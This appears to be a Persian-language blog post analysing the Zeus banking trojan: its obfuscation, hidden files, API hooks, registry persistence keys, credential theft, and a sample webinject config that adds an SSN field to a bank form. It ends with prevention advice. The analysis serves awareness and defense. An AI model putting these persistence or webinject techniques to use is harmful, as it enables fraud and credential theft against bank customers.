درخواست های ارتباط
جستجو
    لیست دوستان من
    صندوق پیام
    همه را دیدم
    • در حال دریافت لیست پیام ها
    صندوق پیام
    رویدادها
    همه را دیدم
    • در حال دریافت لیست رویدادها
    همه رویدادهای من
    اطلاعات دوره آموزشی
    اطلاعات مطلب
      مدرس/نویسنده
      علیرضا
      امتیاز: 62619
      رتبه:14
      0
      568
      27
      407
      کارشناس نرم افزار-کارشناس ارشد فناوری اطلاعات-مدرس کامپیوتر-مدیر فناوری اطلاعات -net+,mcse,ccna,ceh certificate پروفایل کاربر

      معرفی تروجان بانکی Zeus

      تاریخ 22 ماه قبل
      نظرات 0
      بازدیدها 162
      معرفی تروجان بانکی Zeus

      همه چیز در مورد تروجان بانکی زئوس


      تروجان (Trojan) ها در واقع بدافزارهایی هستند که امکان تکثیر نداشته و بوسیله ویروس ها یا کرم های اینترنتی بر روی سیتم قربانی قرار می گیرند و در ظاهر خود را خوب جلوه می دهند ولی در پشت پرده اهداف مخربانه خود را دنبال می کند.(واژه شناسی انواع بدافزارها قسمت اول ) این بدافزارها برای ناشناس ماندن از دید آنتی ویروس ها اقدام به رمزگذاری خود با استفاده کدهای مربوطه می کنند. به تعدادی از مهمترین روشهای مختلفی که تروجان‌ها از آن طریق وارد سیستم قربانی می شوند و باعث آلوده شدن کامپیوتر می شوند در زیر اشاره می شود.
      • انتقال بدافزار از طریق فلش ، هارد های اکسترنال و رسانه های ذخیره ساز مشابه
      • ورود به سایت های نامعتبر و کلیک بر روی لینک های ناشناس
      • بازکردن پیوست های ایمیل های ناشناس و نامعتبر
      • از طریق دانلود و نصب برنامه ها و نرم افزارهای رایگان سایت های نامعتبر
      معرفی تروجان بانکی Zeus

      در ادامه به تشریح فعالیت تروجان زئوس می پردازیم. زئوس در سال 2007 شناسایی شد و در حالی که توانایی انجام انواع فعالیت های خرابکارنرو در حوزه سرقت و دستکاری اطلاعات داره ، اما اغلب برای سرقت اطلاعات بانکی مورد استفاده قرار می گیرد. این تروجان قابلیت اجرا بر روی کلیه نسخه های ویندوز را داشته و با استفاده از تکنیک چند ریختی، مانع از شناسایی شدنش توسط آنتی ویروس ها می شود. زئوس با پیاده سازی لایه‌های رمزنگاری چندگانه، عمل رمزنگاری را جهت شناسایی خودش توسط ویروس یابهای پیشزفته انجام می دهد. نحوه کار این تروجان بطور کلی، به این صورت بوده که حافظه ای را برای خود با استفاده از VirtualAlloc در Heap ایجاد می کند و سپس لایه رمزگشایی‌شده جاری را به Heap کپی می‌کند و آنرا اجرا می‌کند. هر لایه یک روشی از مبهم سازی را با استفاده از الگوریتم های رمزگذاری XOR و ROR پیاده سازی می کند.
      معرفی تروجان بانکی Zeus

      زئوس فایلهای مخفی زیر را در سیستم قربانی ایجاد می کند.
      \windows\system32\lowsec\user.ds-stored keystrokes and imagedata\
      \windows\system32\lowsec\local.ds-retrieved configuration data
      \windows\system32\lowsec\user.ds.lll
      \windows\system32\lowsec\sdra64.exe-encrypted bot executable
      
      این فایلها بر روی دیسک به دلیل هوک API مربوط به NtQueryDirectoryFileمخفی هستند. تابع NtQueryDirectoryFile اصلی فراخوانی می شود و نتایج برای مخفی کردن فایلهای ضروری فیلتر میشوند. فایلهای ذخیره سازی و پیکربندی نه تنها مخفی هستند ، بلکه توسط الگوریتم RC4 که کلید آن، یک کلید 754 بایتی رمزگذاری می شود. . بنابراین ایجاد یک رمزگشای عمومی برای فایلهای ذخیره ساز ی غیرممکن است . کلید RC4 درون اجرایی رمز شده ذخیره می شود و بایستی از کپی غیرفشرده فایل استخراج شود. کد زیر شامل بخشی از تابع معکوس است که لاگ و داده پیکربندی را رمزگذاری / رمزگشایی میکند .
      int rc4(BYTE* buffer, DWORD length)
      {
      BYTE rc4key[258]=
      {
      0x67, 0xE9, 0x30, 0x10, 0x3D, 0xC3, 0x63, 0xE2, 0x9C, 0x6F,0xCD, 0xCC, 0x4F, 0xD0, 0xCB, 0x04,0xD9, 0xB7, 0xA0, 0x2A, 0xA3, 0x13, 0xB4, 0x6A, 0x8D, 0xD8, 0x25,0x2E, 0x22, 0xB8, 0x3A, 0xB0,0x27, 0x35, 0xFC, 0x26, 0x2B, 0x08, 0x8B, 0x8A, 0xAA, 0x69,0x78, 0x8C, 0x84, 0x47, 0x56, 0xCF,0x5D, 0xF6, 0x62, 0xAD, 0x8E, 0xD3, 0x7A, 0x58, 0x03, 0x70,0x4A, 0x45, 0x4D, 0x88, 0x7D, 0x93,0x28, 0x4E, 0x07, 0x51, 0x41, 0xD2, 0x54, 0x20, 0x3E, 0xA6,0x1C, 0xA9, 0x49, 0x6C, 0x23, 0xB2,
      0x86, 0x52, 0x32, 0xAE, 0xB3, 0x97, 0xBE, 0xBA, 0xDC, 0xC5 و ...... 
      
      همچنین از ویژگیهای مهم این تروجان، حذف ردپای به جا گذاشته از خود در طی فرایند جاسازی خود در سیستم و انجام عملیات مخفی سازی و رمز گذاری بده. کد زیر یک بخشی از این فرایند بوده.
      // Commands accepted over named pipe (pipecommand):
      // 0x01-returns the bot version
      // 0x02 -returns the name of the bot
      // 0x03 -issues command to bot to remove all traces of itself from the system, a reboot is required
      // for complete disinfection (handy!)
      .....
      
      زئوس تغییرات زیر را نیز در رجیستری ایجاد می کند که به بخشی از آن اشاره می شود.
      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
      Added: "Userinit" ="C:
      \WINDOWS\system32\userinit.exe,C:
      \WINDOWS\system32\sdra64.exe"
      The following executes without Administrator rights:
      HKCU\Software\Microsoft\Windows\CurrentVersion\Run
      Added: "Userinit" = "C:
      \Documents andSettings\user\Application Data\sdra64.exe"
      
      یکی دیگر از ویژگی های تروجان زئوس، سرقت اعتبارات است، ازجمله کلیدهای خصوصی با هوک کردن تابع PFXImportCertStore است. این تابع یک PFX BLOBرا وارد میکند و هندلی از ذخیره سازی است که شامل اعتبارات است و به هر کلید خصوصی مرتبط برمیگرداند و به محض اینکه تابع فوق با احراز هویت درست فراخوانی می شود، تابع را با هندلی به ذخیره سازی اعتبار و کلیدهای خصوصی در دسترس برمی گرداند که سپس زئوس در فایل user.dsذخیره می کند.نمونه تزریق
      set_url https://www.xxx.com/evaluate GP
      data_before
      class='full_name' maxlength='40' /></div>
      data_end
      data_inject
      <div class='text'><label>SSN:<span
      class='req'>*<
      /span></label><input type="text" name='ssn'
      class='email' maxlength='11' /></div>
      data_end
      data_after
      <div class='text' id='email_wrapper'>
      data_end
      
      همچنین این تروجان با سرقت نشست های بانکی، اقدام به تزریق داده های مورد نظر به صفحات HTML شده . این داده ها درون فایل webinjects.txtقرار دارند که بعداً درون فایل پیکربندی زئوس تعبیه شده است. و هنگامی که صفحه Company evaluation ملاقات میشود ، داده های اضافی به HTML تزریق میشود . تزریق HTMLتوسط هوک کردن توابع wininet زیر انجام میشود.
      wininet.dll!HttpSendRequestW
      wininet.dll!HttpSendRequestA
      wininet.dll!HttpSendRequestExW
      wininet.dll!HttpSendRequestExA
      wininet.dll!InternetReadFile
      wininet.dll!InternetReadFileExW
      wininet.dll!InternetReadFileExA
      wininet.dll!InternetQueryDataAvailable
      wininet.dll!InternetCloseHandle
      wininet.dll!HttpQueryInfoA
      wininet.dll!HttpQueryInfoW
      
      نمونه زئوس موجود در حال حاضر بر روی مرورگر INTERNET EXPLORER اعمال می شود که در نسخه بتای آن بر روی مرورگر فایرفاکس هم عملیاتی بوده.

      روش‌های مقابله با اینگونه بدافزارها


      روشهای پیشگیری بهترین روش، برای مقابله با ینگونه بدافزارها بوده.که در زیر به تعدادی از آنها اشاره می شود :
      • تهیه نسخه پشتیبان بصورت منظم و مدون در بازه های زمانی از اطلاعات کاری و حساس
      • نصب آنتی ویروس و حتما به روز رسانی آن در بازه های زمانی کوتاه
      • نصب آنتی اسپای در کنار آنتی ویروس و البته به روز رسانی
      • راه اندازی فایروال و پیکربندی مناسب
      • رفتار صحیح در محیط اینترنت و عدم مراجعه به سایت های نامطمئن
      • عدم کلیک بر روی لینک های نامعتبر
      • عدم باز کردن پیوست های ایمیل های ناشناس
      • نصب مرورگر مناسب و البته به روز رسانی مناسب
      • نصب نرم افزارهای مطمئن و از سایت های معتبر و در ضمن به روز رسانی آنها
      • عدم نصب رسانه های ذخیره ساز قابل حمل و نامطمئن

      منبع : مرکز ماهر
      نویسنده : علیرضا(ARAF)
      منبع: ITPRO
      هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد
      برچسب ها
      ردیفعنوان
      1باج افزارها-تهدیدات و راهکارها
      2معرفی باج افزار FenixLocker
      3معرفی باج افزار HDDCryptor Ransomware
      4معرفی باج افزار Locky
      5باج افزار ایرانی CLICK ME
      6معرفی باج افزار Cyber SpLiTTer Vbs
      7معرفی باج افزار UnblockUPC
      8معرفی باج افزار MarsJoke
      9معرفی باج افزار Nagini
      1010 واقعیت تکان دهنده در مورد باج افزارها
      11تنها و تنها راه مقابله با باج افزارها
      12معرفی باج افزار DXXD
      13معرفی باج افزار Princess Locker
      14ایمیل های آلوده به باج افزار
      15معرفی باج افزار AL-Namrood
      16معرفی باج افزار TeamXrat
      17معرفی باج افزار Nuke
      18معرفی باج افزار Globe
      19باج افزار Wildfire Locker دستگیر شد
      20باج افزاری که به شما فرصت انتخاب می دهد.(پرداخت باج یا آلوده کردن دیگران)
      21آماری از ناامنی های سایبری در سالی که گذشت (2016)
      22معرفی تروجان بانکی Zeus
      23باج افزار نویسانی که با قربانیان خود مودبانه تعامل می کنند!
      24معرفی باج افزارای که خود را اجاره می دهد!
      25معرفی جاسوس افزاری که باج افزار شد!(Killdisk)
      26هجوم Ransomware ها از طریق پروتکل RDP
      27افشای کلید رمز باج افزار Spora و تهیه ابزاری توسط ESET
      28مراحلی که باج افزار برای آلوده کردن سیستم قربانی دنبال می کند
      29شیوع باج افزارها بعنوان یک خدمت یا سرویس به متقاضیان!!!
      30توزیع گسترده باج افزار wannacrypt
      31انواع باج افزار
      32باج افزاری که باج خود را از کارت های اعتباری طلب می کند نه بیت کوین
      33باج افزارها با رفتارهای عجیب و غریب(شماره یک) !!!
      34باج افزارها با رفتارهای عجیب و غریب(شماره دو) !!!
      35باج افزار Scarabey
      36باج افزاری از نوع ماینر
      37نکاتی پیرامون باج‌افزار Annabelle
      38خلاصی از شر باج‌افزار GandCrab با ابزار Bitdefender
      39باج‌افزار GandCrab و سوء استفاده از آسیب پذیری IE و فلش
      40باج افزاری که به کمک آورگان سوری می آید!!!
      دورهمجموعه کل دوره
      مطالب مرتبط

      در حال دریافت اطلاعات

      نظرات
      هیچ نظری ارسال نشده است

        برای ارسال نظر ابتدا به سایت وارد شوید

        arrow